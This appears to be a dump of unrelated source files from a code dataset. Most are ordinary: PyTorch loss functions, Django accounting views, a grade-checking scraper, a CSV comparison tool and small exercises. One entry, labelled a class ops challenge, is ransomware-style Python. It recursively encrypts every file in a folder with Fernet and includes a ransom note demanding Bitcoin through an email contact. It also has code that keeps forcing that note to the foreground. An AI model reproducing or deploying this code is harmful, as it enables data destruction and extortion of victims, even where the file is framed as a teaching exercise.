cc = cross*cross / (I_var*J_var + self.eps)#np.finfo(float).eps
lcc = -1.0 * torch.mean(cc) + 1
return lcc
class GCC(nn.Module):
"""
global normalized cross correlation (sqrt)
"""
def __init__(self):
super(GCC, self).__init__()
def forward(self, I, J):
I2 = I.pow(2)
J2 = J.pow(2)
IJ = I * J
#average value
I_ave, J_ave= I.mean(), J.mean()
I2_ave, J2_ave = I2.mean(), J2.mean()
IJ_ave = IJ.mean()
cross = IJ_ave - I_ave * J_ave
I_var = I2_ave - I_ave.pow(2)
J_var = J2_ave - J_ave.pow(2)
# cc = cross*cross / (I_var*J_var + np.finfo(float).eps)#1e-5
cc = cross / (I_var.sqrt() * J_var.sqrt() + np.finfo(float).eps)#1e-5
return -1.0 * cc + 1
class Grad(nn.Module):
"""
N-D gradient loss
"""
def __init__(self, penalty='l2'):
super(Grad, self).__init__()
self.penalty = penalty
def _diffs(self, y):#y shape(bs, nfeat, vol_shape)
ndims = y.ndimension() - 2
df = [None] * ndims
for i in range(ndims):
d = i + 2#y shape(bs, c, d, h, w)
# permute dimensions to put the ith dimension first
# r = [d, *range(d), *range(d + 1, ndims + 2)]
y = y.permute(d, *range(d), *range(d + 1, ndims + 2))
dfi = y[1:, ...] - y[:-1, ...]
# permute back
# note: this might not be necessary for this loss specifically,
# since the results are just summed over anyway.
# r = [*range(1, d + 1), 0, *range(d + 1, ndims + 2)]
df[i] = dfi.permute(*range(1, d + 1), 0, *range(d + 1, ndims + 2))
return df
def forward(self, pred):
ndims = pred.ndimension() - 2
if pred.is_cuda:
df = Variable(torch.zeros(1).cuda())
else:
df = Variable(torch.zeros(1))
for f in self._diffs(pred):
if self.penalty == 'l1':
df += f.abs().mean() / ndims
else:
assert self.penalty == 'l2', 'penalty can only be l1 or l2. Got: %s' % self.penalty
df += f.pow(2).mean() / ndims
return df
class Bend_Penalty(nn.Module):
"""
Bending Penalty of the spatial transformation (2D)
"""
def __init__(self):
super(Bend_Penalty, self).__init__()
def _diffs(self, y, dim):#y shape(bs, nfeat, vol_shape)
ndims = y.ndimension() - 2
d = dim + 2
# permute dimensions to put the ith dimension first
# r = [d, *range(d), *range(d + 1, ndims + 2)]
y = y.permute(d, *range(d), *range(d + 1, ndims + 2))
dfi = y[1:, ...] - y[:-1, ...]
# permute back
# note: this might not be necessary for this loss specifically,
# since the results are just summed over anyway.
# r = [*range(1, d + 1), 0, *range(d + 1, ndims + 2)]
df = dfi.permute(*range(1, d + 1), 0, *range(d + 1, ndims + 2))
return df
def forward(self, pred):#shape(B,C,H,W)
Ty = self._diffs(pred, dim=0)
Tx = self._diffs(pred, dim=1)
Tyy = self._diffs(Ty, dim=0)
Txx = self._diffs(Tx, dim=1)
Txy = self._diffs(Tx, dim=0)
p = Tyy.pow(2).mean() + Txx.pow(2).mean() + 2 * Txy.pow(2).mean()
return p
class IDloss(nn.Module):
"""
loss between affine transformation and identity transf.
"""
def __init__(self, penalty='l1'):
super(IDloss, self).__init__()
self.penalty = penalty
self.id = torch.FloatTensor([1, 0, 0, 0, 1, 0])
def forward(self, theta):
if theta.is_cuda:
ID = Variable(self.id.cuda())
else:
ID = Variable(self.id)
ID = ID.repeat(theta.size(0), 1).view(theta.shape)
if self.penalty == 'l1':
loss = torch.mean(torch.abs(theta - ID))
else:
assert self.penalty == 'l2', 'penalty can only be l1 or l2. Got: %s' % self.penalty
loss = torch.mean(torch.pow(theta - ID, 2))
return loss
#test
#a=torch.zeros(1, 2, 30, 40)
#grad=Grad()
#loss = grad(a)
#l = Bend_Penalty()
#a=torch.zeros(1, 2, 30, 40)
#c=l(a)
#print(c) |
22,006 | 4c6e04bf2fa0decefbd6f03538d3f28d801cf459 | a=int(input("Enter a value for a"))
b=int(input("Enter a value for b"))
#multiply a and b
c=a*b
print(c) |
22,007 | 49db7dea645e1f472b28ae314637900a27fb00f8 | from django.shortcuts import render
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from django.urls import reverse_lazy
from django.views.generic import CreateView,ListView,UpdateView,View,FormView,DeleteView,DetailView
from django.shortcuts import redirect,reverse,resolve_url,render,HttpResponse
from django.db.models import FloatField, F,Sum,Case,When,IntegerField,Value,Min,Q,Count,Max
from django.utils.decorators import method_decorator
from user.decorators import *
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
import datetime
from payment.views import create_payment
from account.common import *
from account.models import *
from account.forms import *
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class RegisterExpense(LoginRequiredMixin,CreateView):
login_url = reverse_lazy('login-user')
redirect_field_name = 'next'
template_name = 'expenses/new.html'
form_class = ExpenseForm
context_object_name = 'forms'
header='Record Expense'
def get_context_data(self, **kwargs):
context = super().get_context_data()
context['header'] = self.header
context['forms'] = self.form_class
return context
def post(self,request, *args,**kwargs ):
form = self.form_class(request.POST)
if form.is_valid():
form=form.save(commit=False)
###Create payment
amount=request.POST.get('amount')
payment=create_payment(amount,form.desc,form.date,request.user,1,request.POST.get('account'),request.POST.get('trans_account'))
####JOURNALIZE
insert_on_journal(payment.id,form.date,form.desc,amount,amount,form.invoice,form.champion,request.POST.get('account'),request.POST.get('trans_account'))
insert_on_bankjournal(payment.id, form.date, form.desc, 0,amount, form.invoice, form.champion, request.POST.get('account'))
form.dr=request.POST.get('amount')
form.payment_id=payment.id
form.save()
messages.success(request, 'Success! created company')
return redirect('expenses')
else:
return render(request,self.template_name,{'forms':form})
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class ExpenseList(LoginRequiredMixin,ListView):
login_url = reverse_lazy('login-user')
redirect_field_name = 'next'
template_name = 'expenses/expenses.html'
context_object_name = 'lists'
header = ' Expense Lists'
model=Expensejournal
order=['-id']
def get_context_data(self, **kwargs):
context = super().get_context_data()
context['header'] = self.header
context['lists']=Expensejournal.objects.all().order_by('-id')
context['exsum'] = Expensejournal.objects.filter(date__year=datetime.datetime.today().year).aggregate(sum2=Sum('dr'))['sum2']
return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class ExpenseInGroups(LoginRequiredMixin,ListView):
login_url = reverse_lazy('login-user')
redirect_field_name = 'next'
template_name = 'expenses/expenses_by_account.html'
context_object_name = 'lists'
header = ' Expense Lists'
model=Expensejournal
order=['-id']
def get_context_data(self,*args, **kwargs):
context = super().get_context_data()
year=self.request.GET.get('year')
if not year:
year=datetime.datetime.today().year
context['header'] = self.header+' ['+str(year)+']'
context['lists']=Expensejournal.objects.filter(date__year=year).values(accountname=F('account__name')).annotate(
AccSum=Sum('dr'),no=Count('id')
)
context['exsum'] = Expensejournal.objects.filter(date__year=year).aggregate(sum2=Sum('dr'))['sum2']
return context
################################################
###########DELETE DELETE#############################
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class DeleteTransaction(LoginRequiredMixin,View):
login_url = reverse_lazy('login-user')
redirect_field_name = 'next'
def get(self,request,*args,**kwargs):
delete_transaction(self.kwargs['pk'])
messages.success(request,'Deleted transaction ')
return redirect(reverse('expenses'))
################################
###########CREATE CHART#############
####CHARTS
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class CreateChart(LoginRequiredMixin,CreateView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Chartofaccount
fields = ['name','accountno']
template_name = 'chart/new.html'
context_object_name = 'form'
header='New Chart of Account'
success_url = reverse_lazy('charts')
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class UpdateChartofAccount(LoginRequiredMixin,UpdateView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Chartofaccount
fields = ['name','accountno']
template_name ='chart/new.html'
context_object_name = 'form'
header='Update Chart'
success_url = reverse_lazy('charts')
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class ChartofaccountDelete(LoginRequiredMixin,DeleteView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Chartofaccount
success_message = "Success! deleted charts."
def post(self, request, *args, **kwargs):
try:
return self.delete(request, *args, **kwargs)
except ProtectedError:
messages.warning(request,'Huwezi kufuta chart hii, kuna data zinategemea data hii')
return redirect('charts')
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
def get_success_url(self):
return reverse('charts')
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class ChartsList(LoginRequiredMixin,ListView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Chartofaccount
context_object_name = 'lists'
template_name = 'chart/lists.html'
header='Charts of accounts'
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
###END CHART###########################
################################
###########CREATE ACCOUNTCATEGORY#############
####CACCOUNT CATEGORY
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class CreateAccountcategory(LoginRequiredMixin,CreateView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Accountcategory
fields = ['name','accountno','chart']
template_name = 'categoryaccount/new.html'
context_object_name = 'form'
header='New Account Category'
success_url = reverse_lazy('accountcategories')
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class UpdateAccountcategory(LoginRequiredMixin,UpdateView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Accountcategory
fields = ['name','accountno','chart']
template_name ='categoryaccount/new.html'
context_object_name = 'form'
header='Update Category'
success_url = reverse_lazy('accountcategories')
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class CategoryaccountDelete(LoginRequiredMixin,DeleteView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Accountcategory
success_message = "Success! deleted charts."
def post(self, request, *args, **kwargs):
try:
return self.delete(request, *args, **kwargs)
except ProtectedError:
messages.warning(request,'Huwezi kufuta Account category hii, kuna data zinategemea data hii')
return redirect('accountcategories')
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
def get_success_url(self):
return reverse('accountcategories')
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class AccountcategoryList(LoginRequiredMixin,ListView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Accountcategory
context_object_name = 'lists'
template_name = 'categoryaccount/lists.html'
header='Category accounts'
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
###END ACCOUNT CATEGORY###########################
################################
###########CREATE ACCOUNT#############
####CACCOUNT ACCOUNT
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class CreateAccount(LoginRequiredMixin,CreateView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Account
fields = ['name','accountno','chart','accountcategory','is_cashaccount','is_bankaccount']
template_name = 'account/new.html'
context_object_name = 'form'
header='New Account '
success_url = reverse_lazy('accounts')
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class UpdateAccount(LoginRequiredMixin,UpdateView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Account
fields = ['name','accountno','chart','accountcategory','is_cashaccount','is_bankaccount']
template_name ='account/new.html'
context_object_name = 'form'
header='Update Account'
success_url = reverse_lazy('accounts')
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class AccountDelete(LoginRequiredMixin,DeleteView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Account
success_message = "Success! deleted charts."
def post(self, request, *args, **kwargs):
try:
return self.delete(request, *args, **kwargs)
except ProtectedError:
messages.warning(request,'Huwezi kufuta Account hii, kuna data zinategemea data hii')
return redirect('accounts')
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
def get_success_url(self):
return reverse('accounts')
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class AccountList(LoginRequiredMixin,ListView):
redirect_field_name = 'next'
login_url = reverse_lazy('login_user')
model = Account
context_object_name = 'lists'
template_name = 'account/lists.html'
header=' Accounts'
def get_context_data(self, **kwargs):
context=super().get_context_data()
context['header']=self.header
return context
###END ACCOUNT ###########################
|
22,008 | 37218a4c2ab15649d89a6174e7ff8b9db961a0bc | #!/usr/bin/env python
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2008-2017 German Aerospace Center (DLR) and others.
# This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v2.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v20.html
# @file removeSVN.py
# @author Daniel Krajzewicz
# @author Michael Behrisch
# @date 28-08-2008
# @version $Id$
from __future__ import absolute_import
import os
import sys
import stat
import shutil
path = "./"
if len(sys.argv) > 1:
path = sys.argv[1]
# remove files in ".svn"
for root, dirs, files in os.walk(path):
if root.find(".svn") >= 0:
for file in files:
os.chmod(os.path.join(root, file), stat.S_IWRITE | stat.S_IREAD)
os.remove(os.path.join(root, file))
for dir in dirs:
os.chmod(os.path.join(root, dir), stat.S_IWRITE | stat.S_IREAD)
# remove dirs in ".svn"
for root, dirs, files in os.walk(path):
if ".svn" in dirs:
dirs.remove(".svn")
os.chmod(os.path.join(root, ".svn"), stat.S_IWRITE | stat.S_IREAD)
shutil.rmtree(os.path.join(root, ".svn"))
|
22,009 | 267069959776b68cd8af6506a137cfcc4438f496 | class MenuItem:
def __init__(self, meal_number: int, meal_name: str, price : float, description: str, ingredients: list):
self.meal_number = meal_number
self.meal_name = meal_name
self.price = price
self.description = description
self.ingredients = ingredients |
22,010 | ad7725a5d0732a41dc95b2456387857db62fb6c4 | from classification.classificators.rules.daily_menu.cousine import CousineClassificator
from classification.classificators.rules.daily_menu.simple_rules import *
from classification.models import DailyMenuClassification
from classification.tagger.rules.simple_rules import Vegetarian, Vegan
from restaurants.models import Cousine
class DailyMenuClassificator:
classification_rules = [
ClassificationRule(column='vegetarian', mandatory_tags=[Vegetarian.name]),
ClassificationRule(column='vegan', mandatory_tags=[Vegan.name]),
ClassificationRule(column='pork', mandatory_tags=['vepr', 'slanina']),
ClassificationRule(column='beef', mandatory_tags=['hovezi']),
ClassificationRule(column='pasta', mandatory_tags=['testovina']),
ClassificationRule(column='fish', mandatory_tags=['ryba', 'rybi']),
ClassificationRule(column='poultry', mandatory_tags=['drubez']),
ClassificationRule(column='seafood', mandatory_tags=['morske']),
ClassificationRule(column='meat', mandatory_tags=['maso']),
ClassificationRule(column='mushrooms', mandatory_tags=['houba', 'houbovy']),
ClassificationRule(column='tofu', mandatory_tags=['tofu']),
ClassificationRule(column='venison', mandatory_tags=['divocina']),
ClassificationRule(column='cheese', mandatory_tags=['syr']),
]
def __init__(self):
cousines = Cousine.objects.prefetch_related('cousinetags_set').all()
for cousine in cousines:
self.classification_rules.append(CousineClassificator(cousine=cousine))
def get_classification_columns(self):
return [rule.column for rule in self.classification_rules]
def reset_classification(self, menu):
if menu.automatic_classification:
DailyMenuClassification.objects.filter(pk=menu.automatic_classification).delete()
model = DailyMenuClassification()
model.save()
menu.automatic_classification = model
menu.classification_in_progress = False # classification is assigned, now we need to calculate it
menu.save()
return model
def run_classification(self, menu, tags):
model = self.reset_classification(menu)
for rule in self.classification_rules:
classification = rule.classify(menu, tags)
if model and classification[0] is not None:
setattr(model, classification[0], classification[1])
model.save()
|
22,011 | c818bc090904b619ec3872fe9145a44ac733888f | import os
import requests
import pickledb
from update_email import GradeUpdateEmail
def get_cycle(session, url):
cycle = session.post(url)
return cycle.json().get('data')[0].get('id_ciclo')
def get_student_info(session, url):
info = session.post(url)
return info.json().get('data').get('niveles')[0].get('ide')
def main():
# pickedb filename
PICKLE_FN = 'grades.p'
FICKLE_DIR = os.environ.get('PROJECT_PATH', 'PROJECT_PATH Not Set')
PICKLE_PATH = f'{FICKLE_DIR}/{PICKLE_FN}'
# Data store
store = pickledb.load(PICKLE_PATH, True) # Grades store
# UNISON api urls
LOGIN_URL = 'https://buhos.uson.mx/web/apps/portalAlumnos/index.php/auth/login/entrar'
GRADES_URL = 'https://buhos.uson.mx/portalalumnos/obtener/calificacionesFinalesEstudiante'
INFO_URL = 'https://buhos.uson.mx/web/apps/portalAlumnos/index.php/auth/sesion/datos_alumno'
CYCLE_URL = 'https://buhos.uson.mx/web/apps/portalAlumnos/index.php/horario/ciclosActivos'
# Unison portal auth
PORTAL_USER = os.environ.get('PORTAL_USER', 'User Not Set')
PORTAL_PW = os.environ.get('PORTAL_PW', 'Password Not Set')
form_data_login = {'u': PORTAL_USER, 'p': PORTAL_PW}
USER_EMAIL = os.environ.get('USER_EMAIL', 'Email Not Set') # For emails
with requests.Session() as s:
s.post(LOGIN_URL, data=form_data_login)
# Cycle id for grades
id_cycle = get_cycle(s, CYCLE_URL)
# Student id for grades
id_student = get_student_info(s, INFO_URL)
grades_res = s.post(GRADES_URL, data={
'idEstudiante': id_student,
'idCiclo': id_cycle,
})
subjects = grades_res.json().get('data')
print([f'{dic["DescMateria"]} - {dic["Cal"] or 0}' for dic in subjects])
for subject in subjects:
subject_id = subject.get('ClaveMateria')
subject_grade = subject.get('Cal')
subject_name = subject.get('DescMateria')
if store.exists(subject_id):
old_grade = store.get(subject_id)
if not subject_grade == old_grade:
print(f'Calificacion de {subject_name} ha sido actualizada!')
# Save update to store
store.set(subject_id, subject_grade)
# Send email!
email = GradeUpdateEmail(USER_EMAIL)
email.send_update(subject_name, subject_grade)
else:
print(f'Create {subject_name} store in pickledb!')
store.set(subject_id, subject_grade)
if __name__ == '__main__':
main()
|
22,012 | b8c68c5723a791672bdd589bc3ddd1842b70ef78 | '''
Created on Nov 7, 2016
@author: Ishan.Bhatt
'''
import csv
import sys
import argparse
import pandas as pd
#from _regex_core import String
from __builtin__ import str
import os
import pdb
from pandas.io.tests.parser import skiprows
import time
def read_key_rules(keys_path):
key_rules = {}
with open(keys_path, 'r') as csvfile:
key_reader = csv.reader(csvfile, delimiter = ':')
for row in key_reader:
key_rules[row[0]] = row[1].split(',')
return key_rules
def get_keys(file1, key_rules):
for fname,keys in key_rules.iteritems():
if fname in file1:
return keys #It's a char list like ['0','1','2']
def get_non_keys(file1,keys):
file1_read=pd.read_csv(file1,nrows=2,sep=',|\|',engine='python')
(_,cols) = file1_read.shape
all_keys = set(range(cols - 1))# To ignore timestamp_col & last column as non key part
timestamp_col_index = cols - 2 # save index of timestamp column
all_keys.remove(timestamp_col_index)
keys = map(int, keys)
keys=set(keys)
non_keys = all_keys - keys
return (list(non_keys), timestamp_col_index,list(all_keys))
def compare_csv(file1, file2, keys, non_keys, timestamp_col_index,all_keys, op_folder):
'''
Here we will have comparison logic to create 5 different files in op_folder.
Get the key columns' data from both csv and make crc and compare them.
Now we are getting 0,1 keys for UBSRTOUBSR_ACCTPGP file.
df1 - Vision
df2 - UBSR
df3 - Matched with keys only data.
'''
df1 = pd.read_csv(file1,header=None,sep=',|\|',engine='python')
df2 = pd.read_csv(file2,header=None,sep=',|\|',engine='python')
keys = map(int, keys)
df1=df1.applymap(str)
df2=df2.applymap(str)
df1['crc'] = df1[keys].apply(','.join, axis=1)
df2['crc'] = df2[keys].apply(','.join, axis=1)
df2.set_index('crc', inplace = True)
perfectly_matched_file = os.path.join(op_folder,'perfect_matched.csv')
partially_matched_file = os.path.join(op_folder,'partial_matched.csv')
ubsr_updated = os.path.join(op_folder,'ubsr_updated.csv')
vision_only_file = os.path.join(op_folder,'vision_only.csv')
ubsr_only_file = os.path.join(op_folder,'ubsr_only.csv')
df3 = df1.loc[df1.crc.isin(df2.index)].drop('crc', axis=1)#partial vision data including timestamp from vision
df2.reset_index(drop=True, inplace=True)
df1.set_index('crc', inplace = True)
df2['crc'] = df2[keys].apply(','.join, axis=1)
df4 = df2.loc[df2.crc.isin(df1.index)].drop('crc', axis=1) #partial ubsr data including timestamp from ubsr
df2.set_index('crc', inplace = True)
df1.reset_index(drop=True, inplace=True)
df1['crc'] = df1[keys].apply(','.join, axis=1)
df1.loc[~df1.crc.isin(df2.index)].drop('crc', axis=1).to_csv(vision_only_file, index=False, header = False)
#Changing string timestamp into datetime object
df3.iloc[:,timestamp_col_index] = pd.to_datetime(df3.iloc[:,timestamp_col_index],format='%Y-%m-%d-%H.%M.%S')
df4.iloc[:,timestamp_col_index] = pd.to_datetime(df4.iloc[:,timestamp_col_index],format='%Y-%m-%d-%H.%M.%S')
df5 = pd.concat([df3,df4]).sort_values(timestamp_col_index,ascending=False)
df5.reset_index(drop=True, inplace=True)
df5.drop_duplicates(all_keys,keep=False,inplace=True)
#df6 will have latest timestamp file of partially matched file
df6=df5.sort_values([timestamp_col_index],ascending=False).drop_duplicates(keys,keep='first')
df1['all_keys'] = df1[all_keys].apply(','.join, axis=1)
df1.set_index('all_keys', inplace = True)
df6['all_keys']=df6[all_keys].apply(','.join, axis=1)
df6.loc[df6.all_keys.isin(df1.index)].drop('all_keys',axis=1).to_csv(partially_matched_file, index=False, header = False)
df2['all_keys'] = df2[all_keys].apply(','.join, axis=1)
df2.set_index('all_keys', inplace = True)
df6.loc[df6.all_keys.isin(df2.index)].drop('all_keys',axis=1).to_csv(ubsr_updated, index=False, header = False)
df2['crc'] = df2[keys].apply(','.join, axis=1)
df2.set_index('crc', inplace = True)
df3['non_key'] = df3[non_keys].apply(','.join, axis=1)
df2.rename_axis(None)
df2['non_key'] = df2[non_keys].apply(','.join, axis=1)
df2.set_index('non_key', inplace=True)
df4['non_key']=df4[non_keys].apply(','.join, axis=1)
df4.set_index('non_key', inplace = True)
df3.loc[df3.non_key.isin(df4.index)].drop('non_key', axis=1).to_csv(perfectly_matched_file, index=False, header = False)
#####df3.loc[~df3.non_key.isin(df2.index)].drop('non_key', axis=1).to_csv(partially_matched_file, index=False, header = False)
df2['crc'] = df2[keys].apply(','.join, axis=1)
df2.reset_index(drop=True, inplace=True)
df1.set_index('crc',inplace =True)
df2.loc[~df2.crc.isin(df1.index)].drop('crc', axis=1).to_csv(ubsr_only_file, index=False, header=False)
def main(arguments):
start_time = time.time()
parser = argparse.ArgumentParser()
parser.add_argument('-k', action='store', dest='keys_file', help='Path of keys file', required=True)
parser.add_argument('-f', action='store', dest='first_csv', help='Path of first csv file', required=True)
parser.add_argument('-s', action='store', dest='second_csv', help='Path of second csv file', required=True)
parser.add_argument('-o', action='store', dest='op_folder', help='Path of keys file', required=True)
args = parser.parse_args(arguments)
key_rules = read_key_rules(args.keys_file)
keys = get_keys(args.first_csv, key_rules)
(non_keys ,timestamp_col_index,all_keys) = get_non_keys(args.first_csv, keys)
if keys:
compare_csv(args.first_csv, args.second_csv, keys, non_keys, timestamp_col_index,all_keys ,args.op_folder)
else:
raise "File format not correct"
end_time = time.time()
print end_time-start_time
if __name__ == '__main__':
main(sys.argv[1:]) |
22,013 | 6700dea03b5e738227d28994e500ca9bfbb24e24 | #Exercise Question 4: Given a list iterate it and count the occurrence of each element and create a dictionary to show the count of each element
#Origigal list [11, 45, 8, 11, 23, 45, 23, 45, 89]
#Printing count of each item {11: 2, 45: 3, 8: 1, 23: 2, 89: 1}
import sys
origList= [11, 45, 8, 11, 23, 45, 23, 45, 89]
countDict=dict()
for i in origList:
countDict[i]=origList.count(i)
print(countDict)
|
22,014 | 0f452502b2f623a2c14744c7464941876d6816a7 | #!/usr/bin/env python3
###########################
# Title: OpsChallenge02
# Author:Jeff Snyder
# Date: 18OCT2020
# Purpose:Encrypt/Decrypt a Folder Recursively added ransomware notes
###########################
import os
from cryptography.fernet import Fernet
import smtplib
import ctypes
import win32gui
import urllib.request
import subprocess
import threading
def generate_key():
"""
Generates a key and save it into a file
"""
key = Fernet.generate_key()
with open("secret.key", "wb") as key_file:
key_file.write(key)
def load_key():
"""
Load the previously generated key
"""
return open("secret.key", "rb").read()
def folderEncrypt(fileLocation):
path = fileLocation
files = []
# r=root, d=directories, f = files
for r, d, f in os.walk(path):
for file in f:
files.append(os.path.join(r, file))
for f in files:
print(f)
encrypt(f)
def folderDecrypt(fileLocation):
path = fileLocation
files = []
# r=root, d=directories, f = files
for r, d, f in os.walk(path):
for file in f:
files.append(os.path.join(r, file))
for f in files:
print(f)
decrypt(f)
def encrypt(fileLocation):
key = load_key()
"""
Given a fileLocation (str) and key (bytes), it encrypts the file and write it
"""
f = Fernet(key)
with open(fileLocation, "rb") as file:
# read all file data
file_data = file.read()
# encrypt data
encrypted_data = f.encrypt(file_data)
# write the encrypted file
with open(fileLocation, "wb") as file:
file.write(encrypted_data)
def decrypt(fileLocation):
"""
Given a fileLocation (str) and key (bytes), it decrypts the file and write it
"""
key = load_key()
f = Fernet(key)
with open(fileLocation, "rb") as file:
# read the encrypted data
encrypted_data = file.read()
# decrypt data
decrypted_data = f.decrypt(encrypted_data)
# write the original file
with open(fileLocation, "wb") as file:
file.write(decrypted_data)
def ransomware():
def ransom_note(self):
date = datetime.date.today().strftime('%d-%B-Y')
with open('RANSOM_NOTE.txt', 'w') as f:
f.write(f'''
The harddisks of your computer have been encrypted with an Military grade encryption algorithm.
There is no way to restore your data without a special key.
Only we can decrypt your files!
To purchase your key and restore your data, please follow these three easy steps:
1. Email the file called EMAIL_ME.txt at {self.sysRoot}Desktop/EMAIL_ME.txt to GetYourFilesBack@protonmail.com
2. You will recieve your personal BTC address for payment.
Once payment has been completed, send another email to GetYourFilesBack@protonmail.com stating "PAID".
We will check to see if payment has been paid.
3. You will receive a text file with your KEY that will unlock all your files.
IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
WARNING:
Do NOT attempt to decrypt your files with any software as it is obselete and will not work, and may cost you more to unlcok your files.
Do NOT change file names, mess with the files, or run deccryption software as it will cost you more to unlock your files-
-and there is a high chance you will lose your files forever.
Do NOT send "PAID" button without paying, price WILL go up for disobedience.
Do NOT think that we wont delete your files altogether and throw away the key if you refuse to pay. WE WILL.
''')
def show_ransom_note(self):
# Open the ransom note
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
count = 0 # Debugging/Testing
while True:
time.sleep(0.1)
top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if top_window == 'RANSOM_NOTE - Notepad':
print('Ransom note is the top window - do nothing') # Debugging/Testing
pass
else:
print('Ransom note is not the top window - kill/create process again') # Debugging/Testing
# Kill ransom note so we can open it agian and make sure ransom note is in ForeGround (top of all windows)
time.sleep(0.1)
ransom.kill()
# Open the ransom note
time.sleep(0.1)
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
# sleep for 10 seconds
time.sleep(10)
count +=1
if count == 5:
break
# Decrypts system when text file with un-encrypted key in it is placed on dekstop of target machine
# def put_me_on_desktop(self):
# # Loop to check file and if file it will read key and then self.key + self.cryptor will be valid for decrypting-
# # -the files
# print('started') # Debugging/Testing
# while True:
# try:
# print('trying') # Debugging/Testing
# # The ATTACKER decrypts the fernet symmetric key on their machine and then puts the un-encrypted fernet-
# # -key in this file and sends it in a email to victim. They then put this on the desktop and it will be-
# # -used to un-encrypt the system. AT NO POINT DO WE GIVE THEM THE PRIVATE ASSYEMTRIC KEY etc.
# with open(f'{self.sysRoot}/Desktop/PUT_ME_ON_DESKTOP.txt', 'r') as f:
# self.key = f.read()
# self.crypter = Fernet(self.key)
# # Decrpyt system once have file is found and we have cryptor with the correct key
# self.crypt_system(encrypted=True)
# print('decrypted') # Debugging/Testing
# break
# except Exception as e:
# print(e) # Debugging/Testing
# pass
# time.sleep(10) # Debugging/Testing check for file on desktop ever 10 seconds
# print('Checking for PUT_ME_ON_DESKTOP.txt') # Debugging/Testing
# # Would use below code in real life etc... above 10secs is just to "show" concept
# # Sleep ~ 3 mins
# # secs = 60
# # mins = 3
# # time.sleep((mins*secs))
def main():
print("1. Encrypt a folder \n2. Decrypt a folder")
mode=input("Which mode would you like to run? Choose 1-3: ")
print("mode is:", mode)
if mode== "1":
generate_key()
print("You have chosen 1")
fileLocation=input("You have chosen mode 1. \nPlease type the location of the folder you would like to encrypt: ")
folderEncrypt(fileLocation)
elif mode== "2":
print("You have chosen mode 2")
fileLocation=input("You have chosen mode 2. \nPlease type the location of the folder you would like to decrypt: ")
folderDecrypt(fileLocation)
elif mode== "3":
print("You have chosen mode 3 which is a simulation. Use mode 2 to unencrypt")
fileLocation=input("Enter the file location.")
folderEncrypt(fileLocation)
ransomware()
main()
# with help from "https://github.com/ncorbuk/Python-Ransomware/blob/master/RansomWare.py"
# help from https://devqa.io/encrypt-decrypt-data-python/
# help from https://www.thepythoncode.com/article/encrypt-decrypt-files-symmetric-python |
22,015 | d3435b91000d938971c0c781b5257aa62ef10870 | name = 'Euzebiusz'
a, b = 1,2 # przypisanie rozpakowujące krotkę
c, d = [1,2] # przypisanie rozpakowujące listę
a,b,c,d = [1,2,3,4]
first, *other = [1, 2, 3, 4] # rozszerzone przypisanie sekwencji (Python 3)
print(first, other)
first,*other,last = [1,2,3,4]
print(first, other, last)
a += 42 # przypisanie rozszerzone
|
22,016 | 9c6c2723f09e50739430f0885d478412875dec94 | credential_path = "My First Project-a1358813ada7.json" |
22,017 | 9e30d6ee97bc16996463b268b374c28c976a5270 | from human import Human
from ai import Ai
class Game:
def __init__(self):
self.player_one = Human()
self.player_two = None
def run_game(self):
self.welcome_message()
self.display_rules()
self.game_type()
self.game_rounds()
self.get_game_winner()
def welcome_message(self):
print('Welcome to Rock, Paper, Scissors, Lizard, Spock game!')
